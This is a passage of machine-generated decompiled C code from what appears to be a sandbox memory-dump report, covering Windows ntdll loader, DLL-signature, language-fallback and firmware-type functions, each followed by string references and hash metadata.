                                                								_t159 = E0166A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                								__eflags = _t159;
                                                								if(_t159 < 0) {
                                                									_t81 =  *0x16d5780; // 0x0
                                                									__eflags = _t81 & 0x00000003;
                                                									if((_t81 & 0x00000003) != 0) {
                                                										_push(_t159);
                                                										E01665510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                										_t81 =  *0x16d5780; // 0x0
                                                									}
                                                									__eflags = _t81 & 0x00000010;
                                                									if((_t81 & 0x00000010) != 0) {
                                                										asm("int3");
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							_t159 = E015F849B(0, _t122, _t153, _t159, _t180);
                                                							if(_t159 >= 0) {
                                                								goto L6;
                                                							}
                                                						}
                                                						_t80 = _t159;
                                                						goto L8;
                                                					} else {
                                                						_t125 = 0x13;
                                                						asm("int 0x29");
                                                						_push(0);
                                                						_push(_t159);
                                                						_t161 = _t125;
                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                						_t143 = 0;
                                                						_v40 = _t161;
                                                						_t118 = 0;
                                                						_push(_t153);
                                                						__eflags = _t87;
                                                						if(_t87 != 0) {
                                                							_t118 = _t87 + 0x5d8;
                                                							__eflags = _t118;
                                                							if(_t118 == 0) {
                                                								L46:
                                                								_t118 = 0;
                                                							} else {
                                                								__eflags =  *(_t118 + 0x30);
                                                								if( *(_t118 + 0x30) == 0) {
                                                									goto L46;
                                                								}
                                                							}
                                                						}
                                                						_v32 = 0;
                                                						_v28 = 0;
                                                						_v16 = 0;
                                                						_v20 = 0;
                                                						_v12 = 0;
                                                						__eflags = _t118;
                                                						if(_t118 != 0) {
                                                							__eflags = _t161;
                                                							if(_t161 != 0) {
                                                								__eflags =  *(_t118 + 8);
                                                								if( *(_t118 + 8) == 0) {
                                                									L22:
                                                									_t143 = 1;
                                                									__eflags = 1;
                                                								} else {
                                                									_t19 = _t118 + 0x40; // 0x40
                                                									_t156 = _t19;
                                                									E015F8999(_t19,  &_v16);
                                                									__eflags = _v0;
                                                									if(_v0 != 0) {
                                                										__eflags = _v0 - 1;
                                                										if(_v0 != 1) {
                                                											goto L22;
                                                										} else {
                                                											_t128 =  *(_t161 + 0x64);
                                                											__eflags =  *(_t161 + 0x64);
                                                											if( *(_t161 + 0x64) == 0) {
                                                												goto L22;
                                                											} else {
                                                												E015F8999(_t128,  &_v12);
                                                												_t147 = _v12;
                                                												_t91 = 0;
                                                												__eflags = 0;
                                                												_t129 =  *_t147;
                                                												while(1) {
                                                													__eflags =  *((intOrPtr*)(0x16d5c60 + _t91 * 8)) - _t129;
                                                													if( *((intOrPtr*)(0x16d5c60 + _t91 * 8)) == _t129) {
                                                														break;
                                                													}
                                                													_t91 = _t91 + 1;
                                                													__eflags = _t91 - 5;
                                                													if(_t91 < 5) {
                                                														continue;
                                                													} else {
                                                														_t131 = 0;
                                                														__eflags = 0;
                                                													}
                                                													L37:
                                                													__eflags = _t131;
                                                													if(_t131 != 0) {
                                                														goto L22;
                                                													} else {
                                                														__eflags = _v16 - _t147;
                                                														if(_v16 != _t147) {
                                                															goto L22;
                                                														} else {
                                                															E01602280(_t92, 0x16d86cc);
                                                															_t94 = E016B9DFB( &_v20);
                                                															__eflags = _t94 - 1;
                                                															if(_t94 != 1) {
                                                															}
                                                															asm("movsd");
                                                															asm("movsd");
                                                															asm("movsd");
                                                															asm("movsd");
                                                															 *_t118 =  *_t118 + 1;
                                                															asm("adc dword [ebx+0x4], 0x0");
                                                															_t95 = E016161A0( &_v32);
                                                															__eflags = _t95;
                                                															if(_t95 != 0) {
                                                																__eflags = _v32 | _v28;
                                                																if((_v32 | _v28) != 0) {
                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                																	_t134 = _t71;
                                                																	goto L55;
                                                																}
                                                															}
                                                															goto L30;
                                                														}
                                                													}
                                                													goto L56;
                                                												}
                                                												_t92 = 0x16d5c64 + _t91 * 8;
                                                												asm("lock xadd [eax], ecx");
                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                												goto L37;
                                                											}
                                                										}
                                                										goto L56;
                                                									} else {
                                                										_t143 = E015F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                										__eflags = _t143;
                                                										if(_t143 != 0) {
                                                											_t157 = _v12;
                                                											_t103 = 0;
                                                											__eflags = 0;
                                                											_t136 =  &(_t157[1]);
                                                											 *(_t161 + 0x64) = _t136;
                                                											_t151 =  *_t157;
                                                											_v20 = _t136;
                                                											while(1) {
                                                												__eflags =  *((intOrPtr*)(0x16d5c60 + _t103 * 8)) - _t151;
                                                												if( *((intOrPtr*)(0x16d5c60 + _t103 * 8)) == _t151) {
                                                													break;
                                                												}
                                                												_t103 = _t103 + 1;
                                                												__eflags = _t103 - 5;
                                                												if(_t103 < 5) {
                                                													continue;
                                                												}
                                                												L21:
                                                												_t105 = E0162F380(_t136, 0x15c1184, 0x10);
                                                												__eflags = _t105;
                                                												if(_t105 != 0) {
                                                													__eflags =  *_t157 -  *_v16;
                                                													if( *_t157 >=  *_v16) {
                                                														goto L22;
                                                													} else {
                                                														asm("cdq");
                                                														_t166 = _t157[5] & 0x0000ffff;
                                                														_t108 = _t157[5] & 0x0000ffff;
                                                														asm("cdq");
                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                														if(__eflags > 0) {
                                                															L29:
                                                															E01602280(_t108, 0x16d86cc);
                                                															 *_t118 =  *_t118 + 1;
                                                															_t42 = _t118 + 0x40; // 0x3f
                                                															_t156 = _t42;
                                                															asm("adc dword [ebx+0x4], 0x0");
                                                															asm("movsd");
                                                															asm("movsd");
                                                															asm("movsd");
                                                															asm("movsd");
                                                															_t110 = E016161A0( &_v32);
                                                															__eflags = _t110;
                                                															if(_t110 != 0) {
                                                																__eflags = _v32 | _v28;
                                                																if((_v32 | _v28) != 0) {
                                                																	_t134 = _v20;
                                                																	L55:
                                                																	E016B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                																}
                                                															}
                                                															L30:
                                                															 *_t118 =  *_t118 + 1;
                                                															asm("adc dword [ebx+0x4], 0x0");
                                                															E015FFFB0(_t118, _t156, 0x16d86cc);
                                                															goto L22;
                                                														} else {
                                                															if(__eflags < 0) {
                                                																goto L22;
                                                															} else {
                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                																	goto L22;
                                                																} else {
                                                																	goto L29;
                                                																}
                                                															}
                                                														}
                                                													}
                                                													goto L56;
                                                												}
                                                												goto L22;
                                                											}
                                                											asm("lock inc dword [eax]");
                                                											goto L21;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						return _t143;
                                                					}
                                                				} else {
                                                					_push( &_v8);
                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                					_push(__ecx + 0x40);
                                                					_push(_t121);
                                                					_push(0xffffffff);
                                                					_t80 = E01629A00();
                                                					_t159 = _t80;
                                                					if(_t159 < 0) {
                                                						L8:
                                                						return _t80;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                				L56:
                                                			}












































                                                0x015f88f7
                                                0x015f88f7
                                                0x015f88fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f88fa
                                                0x015f88f5
                                                0x015f88f3
                                                0x00000000
                                                0x015f88d5
                                                0x00000000
                                                0x015f88b2
                                                0x015f88c9
                                                0x00000000
                                                0x015f88c9
                                                0x015f887f
                                                0x015f886a
                                                0x015f8857
                                                0x015f8852
                                                0x015f88bf
                                                0x015f88bf
                                                0x015f87aa
                                                0x015f87ad
                                                0x015f87ae
                                                0x015f87b4
                                                0x015f87b5
                                                0x015f87b6
                                                0x015f87b8
                                                0x015f87bd
                                                0x015f87c1
                                                0x015f87f4
                                                0x015f87fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015f87c1
                                                0x00000000

                                                Strings
                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01649C18
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01649C28
                                                • LdrpDoPostSnapWork, xrefs: 01649C1E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 2994545307-1948996284
                                                • Opcode ID: 90146bc88d88dc38d9eb79cbeb883402633c1ab4e234a8e4507eaf384434eaa7
                                                • Instruction ID: 8bc3cdd0c9fdfb2274b557a57f3116f7decd1566c92ca9aed222168452175007
                                                • Opcode Fuzzy Hash: 90146bc88d88dc38d9eb79cbeb883402633c1ab4e234a8e4507eaf384434eaa7
                                                • Instruction Fuzzy Hash: 4691F171A002169FEF18DF59D881ABEBBB6FF84314F18456DDA01AF251D730E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E015F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				signed int _t73;
                                                				void* _t77;
                                                				char* _t82;
                                                				char* _t87;
                                                				signed char* _t97;
                                                				signed char _t102;
                                                				intOrPtr _t107;
                                                				signed char* _t108;
                                                				intOrPtr _t112;
                                                				intOrPtr _t124;
                                                				intOrPtr _t125;
                                                				intOrPtr _t126;
                                                
                                                				_t107 = __edx;
                                                				_v12 = __ecx;
                                                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                				_t124 = 0;
                                                				_v20 = __edx;
                                                				if(E015FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                					_t112 = _v8;
                                                				} else {
                                                					_t112 = 0;
                                                					_v8 = 0;
                                                				}
                                                				if(_t112 != 0) {
                                                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                						_t124 = 0xc000007b;
                                                						goto L8;
                                                					}
                                                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                					 *(_t125 + 0x34) = _t73;
                                                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                						goto L3;
                                                					}
                                                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                					_t124 = E015EC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                					if(_t124 < 0) {
                                                						goto L8;
                                                					} else {
                                                						goto L3;
                                                					}
                                                				} else {
                                                					L3:
                                                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                						L8:
                                                						return _t124;
                                                					}
                                                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                							goto L5;
                                                						}
                                                						_t102 =  *0x16d5780; // 0x0
                                                						if((_t102 & 0x00000003) != 0) {
                                                							E01665510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                							_t102 =  *0x16d5780; // 0x0
                                                						}
                                                						if((_t102 & 0x00000010) != 0) {
                                                							asm("int3");
                                                						}
                                                						_t124 = 0xc0000428;
                                                						goto L8;
                                                					}
                                                					L5:
                                                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                						goto L8;
                                                					}
                                                					_t77 = _a4 - 0x40000003;
                                                					if(_t77 == 0 || _t77 == 0x33) {
                                                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                						if(E01607D50() != 0) {
                                                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                						} else {
                                                							_t82 = 0x7ffe0384;
                                                						}
                                                						_t108 = 0x7ffe0385;
                                                						if( *_t82 != 0) {
                                                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                								if(E01607D50() == 0) {
                                                									_t97 = 0x7ffe0385;
                                                								} else {
                                                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                								}
                                                								if(( *_t97 & 0x00000020) != 0) {
                                                									E01667016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                								}
                                                							}
                                                						}
                                                						if(_a4 != 0x40000003) {
                                                							L14:
                                                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                							if(E01607D50() != 0) {
                                                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                							} else {
                                                								_t87 = 0x7ffe0384;
                                                							}
                                                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                								if(E01607D50() != 0) {
                                                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                								}
                                                								if(( *_t108 & 0x00000020) != 0) {
                                                									E01667016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                								}
                                                							}
                                                							goto L8;
                                                						} else {
                                                							_v16 = _t125 + 0x24;
                                                							_t124 = E0161A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                							if(_t124 < 0) {
                                                								E015EB1E1(_t124, 0x1490, 0, _v16);
                                                								goto L8;
                                                							}
                                                							goto L14;
                                                						}
                                                					} else {
                                                						goto L8;
                                                					}
                                                				}
                                                			}





















                                                Strings
                                                • LdrpCompleteMapModule, xrefs: 01649898
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01649891
                                                • minkernel\ntdll\ldrmap.c, xrefs: 016498A2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: 6a2e1e5f284560467ba2829226c651f1c4f51af53238f54e6bb31a4742c1158f
                                                • Instruction ID: 12c1f594e208ea7079033856196bfaa751aa02a50fe9a74126b27bdea7f0e03e
                                                • Opcode Fuzzy Hash: 6a2e1e5f284560467ba2829226c651f1c4f51af53238f54e6bb31a4742c1158f
                                                • Instruction Fuzzy Hash: C251AB31A006469FE726CF6CCD44B2A7BE4BB49718F140AAEEB519B7D1D734E900CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E015EE620(void* __ecx, short* __edx, short* _a4) {
                                                				char _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				char* _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v44;
                                                				signed int _v48;
                                                				intOrPtr _v52;
                                                				void* _v56;
                                                				void* _v60;
                                                				char _v64;
                                                				void* _v68;
                                                				void* _v76;
                                                				void* _v84;
                                                				signed int _t59;
                                                				signed int _t74;
                                                				signed short* _t75;
                                                				signed int _t76;
                                                				signed short* _t78;
                                                				signed int _t83;
                                                				short* _t93;
                                                				signed short* _t94;
                                                				short* _t96;
                                                				void* _t97;
                                                				signed int _t99;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t80 = __ecx;
                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                				_t96 = __edx;
                                                				_v44 = __edx;
                                                				_t78 = 0;
                                                				_v56 = 0;
                                                				if(__ecx == 0 || __edx == 0) {
                                                					L28:
                                                					_t97 = 0xc000000d;
                                                				} else {
                                                					_t93 = _a4;
                                                					if(_t93 == 0) {
                                                						goto L28;
                                                					}
                                                					_t78 = E015EF358(__ecx, 0xac);
                                                					if(_t78 == 0) {
                                                						_t97 = 0xc0000017;
                                                						L6:
                                                						if(_v56 != 0) {
                                                							_push(_v56);
                                                							E016295D0();
                                                						}
                                                						if(_t78 != 0) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                						}
                                                						return _t97;
                                                					}
                                                					E0162FA60(_t78, 0, 0x158);
                                                					_v48 = _v48 & 0x00000000;
                                                					_t102 = _t101 + 0xc;
                                                					 *_t96 = 0;
                                                					 *_t93 = 0;
                                                					E0162BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                					_v36 = 0x18;
                                                					_v28 =  &_v44;
                                                					_v64 = 0;
                                                					_push( &_v36);
                                                					_push(0x20019);
                                                					_v32 = 0;
                                                					_push( &_v64);
                                                					_v24 = 0x40;
                                                					_v20 = 0;
                                                					_v16 = 0;
                                                					_t97 = E01629600();
                                                					if(_t97 < 0) {
                                                						goto L6;
                                                					}
                                                					E0162BB40(0,  &_v36, L"InstallLanguageFallback");
                                                					_push(0);
                                                					_v48 = 4;
                                                					_t97 = L015EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                					if(_t97 >= 0) {
                                                						if(_v52 != 1) {
                                                							L17:
                                                							_t97 = 0xc0000001;
                                                							goto L6;
                                                						}
                                                						_t59 =  *_t78 & 0x0000ffff;
                                                						_t94 = _t78;
                                                						_t83 = _t59;
                                                						if(_t59 == 0) {
                                                							L19:
                                                							if(_t83 == 0) {
                                                								L23:
                                                								E0162BB40(_t83, _t102 + 0x24, _t78);
                                                								if(L015F43C0( &_v48,  &_v64) == 0) {
                                                									goto L17;
                                                								}
                                                								_t84 = _v48;
                                                								 *_v48 = _v56;
                                                								if( *_t94 != 0) {
                                                									E0162BB40(_t84, _t102 + 0x24, _t94);
                                                									if(L015F43C0( &_v48,  &_v64) != 0) {
                                                										 *_a4 = _v56;
                                                									} else {
                                                										_t97 = 0xc0000001;
                                                										 *_v48 = 0;
                                                									}
                                                								}
                                                								goto L6;
                                                							}
                                                							_t83 = _t83 & 0x0000ffff;
                                                							while(_t83 == 0x20) {
                                                								_t94 =  &(_t94[1]);
                                                								_t74 =  *_t94 & 0x0000ffff;
                                                								_t83 = _t74;
                                                								if(_t74 != 0) {
                                                									continue;
                                                								}
                                                								goto L23;
                                                							}
                                                							goto L23;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						while(1) {
                                                							L14:
                                                							_t27 =  &(_t94[1]); // 0x2
                                                							_t75 = _t27;
                                                							if(_t83 == 0x2c) {
                                                								break;
                                                							}
                                                							_t94 = _t75;
                                                							_t76 =  *_t94 & 0x0000ffff;
                                                							_t83 = _t76;
                                                							if(_t76 != 0) {
                                                								continue;
                                                							}
                                                							goto L23;
                                                						}
                                                						 *_t94 = 0;
                                                						_t94 = _t75;
                                                						_t83 =  *_t75 & 0x0000ffff;
                                                						goto L19;
                                                					}
                                                				}
                                                			}
































                                                Strings
                                                • InstallLanguageFallback, xrefs: 015EE6DB
                                                • @, xrefs: 015EE6C0
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015EE68C
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1757540487
                                                • Opcode ID: 3c9bb0e1493e7233ff6688147a312581739ddc982a250d5d17ae194d942315d1
                                                • Instruction ID: 80927062c6e3a0aae753d0a445bd4c97802df957f4a28dfb59c8b52e1d4236f6
                                                • Opcode Fuzzy Hash: 3c9bb0e1493e7233ff6688147a312581739ddc982a250d5d17ae194d942315d1
                                                • Instruction Fuzzy Hash: 8B51B3766153569BD714DF68C844A6BB7E8FF88714F04092EFA86DB240FB34D904C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E016651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed short* _t63;
                                                				signed int _t64;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				intOrPtr _t74;
                                                				intOrPtr _t84;
                                                				intOrPtr _t88;
                                                				intOrPtr _t94;
                                                				void* _t100;
                                                				void* _t103;
                                                				intOrPtr _t105;
                                                				signed int _t106;
                                                				short* _t108;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				signed int* _t115;
                                                				signed short* _t117;
                                                				void* _t118;
                                                				void* _t119;
                                                
                                                				_push(0x80);
                                                				_push(0x16c05f0);
                                                				E0163D0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                				_t115 =  *(_t118 + 0xc);
                                                				 *(_t118 - 0x7c) = _t115;
                                                				 *((char*)(_t118 - 0x65)) = 0;
                                                				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                				_t113 = 0;
                                                				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                				_t100 = __ecx;
                                                				if(_t100 == 0) {
                                                					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                					E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                					 *((char*)(_t118 - 0x65)) = 1;
                                                					_t63 =  *(_t118 - 0x90);
                                                					_t101 = _t63[2];
                                                					_t64 =  *_t63 & 0x0000ffff;
                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                					L20:
                                                					_t65 = _t64 >> 1;
                                                					L21:
                                                					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                					if(_t108 == 0) {
                                                						L27:
                                                						 *_t115 = _t65 + 1;
                                                						_t67 = 0xc0000023;
                                                						L28:
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                						L29:
                                                						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                						E016653CA(0);
                                                						return E0163D130(0, _t113, _t115);
                                                					}
                                                					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                							 *_t108 = 0;
                                                						}
                                                						goto L27;
                                                					}
                                                					 *_t115 = _t65;
                                                					_t115 = _t65 + _t65;
                                                					E0162F3E0(_t108, _t101, _t115);
                                                					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                					_t67 = 0;
                                                					goto L28;
                                                				}
                                                				_t103 = _t100 - 1;
                                                				if(_t103 == 0) {
                                                					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                					_t74 = E01603690(1, _t117, 0x15c1810, _t118 - 0x74);
                                                					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                					_t101 = _t117[2];
                                                					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                					if(_t74 < 0) {
                                                						_t64 =  *_t117 & 0x0000ffff;
                                                						_t115 =  *(_t118 - 0x7c);
                                                						goto L20;
                                                					}
                                                					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                					_t115 =  *(_t118 - 0x7c);
                                                					goto L21;
                                                				}
                                                				if(_t103 == 1) {
                                                					_t105 = 4;
                                                					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                					_push(_t118 - 0x70);
                                                					_push(0);
                                                					_push(0);
                                                					_push(_t105);
                                                					_push(_t118 - 0x78);
                                                					_push(0x6b);
                                                					 *((intOrPtr*)(_t118 - 0x64)) = E0162AA90();
                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                					_t113 = L01604620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                					if(_t113 != 0) {
                                                						_push(_t118 - 0x70);
                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                						_push(_t113);
                                                						_push(4);
                                                						_push(_t118 - 0x78);
                                                						_push(0x6b);
                                                						_t84 = E0162AA90();
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                						if(_t84 < 0) {
                                                							goto L29;
                                                						}
                                                						_t110 = 0;
                                                						_t106 = 0;
                                                						while(1) {
                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                							 *(_t118 - 0x88) = _t106;
                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                								break;
                                                							}
                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                							_t106 = _t106 + 1;
                                                						}
                                                						_t88 = E0166500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                						_t119 = _t119 + 0x1c;
                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                						if(_t88 < 0) {
                                                							goto L29;
                                                						}
                                                						_t101 = _t118 - 0x3c;
                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                						goto L21;
                                                					}
                                                					_t67 = 0xc0000017;
                                                					goto L28;
                                                				}
                                                				_push(0);
                                                				_push(0x20);
                                                				_push(_t118 - 0x60);
                                                				_push(0x5a);
                                                				_t94 = E01629860();
                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                				if(_t94 < 0) {
                                                					goto L29;
                                                				}
                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                					_t101 = L"Legacy";
                                                					_push(6);
                                                				} else {
                                                					_t101 = L"UEFI";
                                                					_push(4);
                                                				}
                                                				_pop(_t65);
                                                				goto L21;
                                                			}























                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 52a71284adc9718673782ab3a8a5ada84216836ee1eaae0e93223a6c05723add
                                                • Instruction ID: 237b0174b4b6526db07d14e2794dfa8561ab6db51f927d93a8a8401ed6d28ded
                                                • Opcode Fuzzy Hash: 52a71284adc9718673782ab3a8a5ada84216836ee1eaae0e93223a6c05723add
                                                • Instruction Fuzzy Hash: 2D517D71A007199FDB24DFA9CD81AAEBBF9FF48B40F14402DE64AEB251E7719901CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E0160B944(signed int* __ecx, char __edx) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				char _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				signed int* _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				intOrPtr _v72;
                                                				intOrPtr _v76;
                                                				char _v77;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t65;
                                                				intOrPtr _t67;
                                                				intOrPtr _t68;
                                                				char* _t73;
                                                				intOrPtr _t77;
                                                				intOrPtr _t78;
                                                				signed int _t82;
                                                				intOrPtr _t83;
                                                				void* _t87;
                                                				char _t88;
                                                				intOrPtr* _t89;
                                                				intOrPtr _t91;
                                                				void* _t97;
                                                				intOrPtr _t100;
                                                				void* _t102;
                                                				void* _t107;
                                                				signed int _t108;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				intOrPtr* _t114;
                                                				intOrPtr _t115;
                                                				intOrPtr _t116;
                                                				intOrPtr _t117;
                                                				signed int _t118;
                                                				void* _t130;
                                                
                                                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                				_v8 =  *0x16dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                				_t112 = __ecx;
                                                				_v77 = __edx;
                                                				_v48 = __ecx;
                                                				_v28 = 0;
                                                				_t5 = _t112 + 0xc; // 0x575651ff
                                                				_t105 =  *_t5;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				if(_t105 == 0) {
                                                					_t50 = _t112 + 4; // 0x5de58b5b
                                                					_t60 =  *__ecx |  *_t50;
                                                					if(( *__ecx |  *_t50) != 0) {
                                                						 *__ecx = 0;
                                                						__ecx[1] = 0;
                                                						if(E01607D50() != 0) {
                                                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                						} else {
                                                							_t65 = 0x7ffe0386;
                                                						}
                                                						if( *_t65 != 0) {
                                                							E016B8CD6(_t112);
                                                						}
                                                						_push(0);
                                                						_t52 = _t112 + 0x10; // 0x778df98b
                                                						_push( *_t52);
                                                						_t60 = E01629E20();
                                                					}
                                                					L20:
                                                					_pop(_t107);
                                                					_pop(_t113);
                                                					_pop(_t87);
